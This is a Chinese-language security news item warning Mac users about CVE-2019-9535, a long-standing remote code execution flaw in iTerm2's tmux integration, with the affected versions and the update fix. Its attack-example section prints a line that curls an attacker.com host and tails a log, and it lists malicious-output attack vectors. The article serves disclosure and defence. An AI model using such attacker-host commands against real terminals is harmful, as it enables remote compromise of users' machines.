10.22 用Mac的同志請警惕!你可能做了黑客七年的肉雞

由 網絡安全公司 (ROS) 發佈的審計結果顯示, iTerm 2 中存在一個嚴重的遠程代碼執行 (RCE) 漏洞,且至少已存在7年,知曉此漏洞的黑客,可以對存在漏洞的目標進行任意控制。

iTerm 2 簡介

iTerm2 是全球最熱門的終端模擬器之一,是開發人員經常使用的 MacOS 終端工具,是 Mac 內置終端 app 最有力的熱門開源工具替代品之一,被很多開發人員稱為“Mac 終端利器”。

漏洞概述

CVE 編號:CVE-2019-9535。

該漏洞描述:ROS 在iTerm2 的 tmux集成功能中找到了一個至少已存在7年之久的嚴重漏洞。黑客如果能輸出終端,則在很多情況下能夠在目標計算機上執行命令。

攻擊案例:使目標連接到由攻擊者控制的 SSH 服務器或其他惡意命令


curl http://attacker.com and tail -f /var/log/apache2/referer_log

Nachman 認為該漏洞影響的iTerm2 用戶數量介於10萬至20萬之間。

Mozilla 公司的安全工程師 Tom Ritter 指出,這個漏洞源自 iTerm2 中的 tmux 集成功能。Tumx 應用程序是一款終端多路複用器,可允許從單個設備創建並控制多個終端。

CERT 協調中心發佈漏洞通知表示,可通過使用命令行工具在終端屏幕上打印由攻擊者控制的內容,從而利用該漏洞。該中心指出,“潛在的攻擊向量包括通過 ssh 連接至惡意服務器,通過curl 獲取惡意網站,或者通過 tail –f 跟蹤包含某些惡意內容的日誌文件。”

一般情況下,該漏洞需要某些用戶交互或伎倆才能遭觸發,但由於它可通過通常被認為是安全的命令利用,因此它的潛在影響力巨大。

影響版本

該漏洞影響於本週早些時候發佈的 3.3.5 版本及之前版本。

修復方案

用Mac的同志請警惕!你可能做了黑客七年的肉雞

目前補丁已發佈但自動更新尚未推送,立即在 iTerm2 目錄中選擇“檢查新版本”手動更新至最新版本 3.3.6,即可修復該漏洞啦!

用Mac的同志請警惕!你可能做了黑客七年的肉雞




分享到:


相關文章: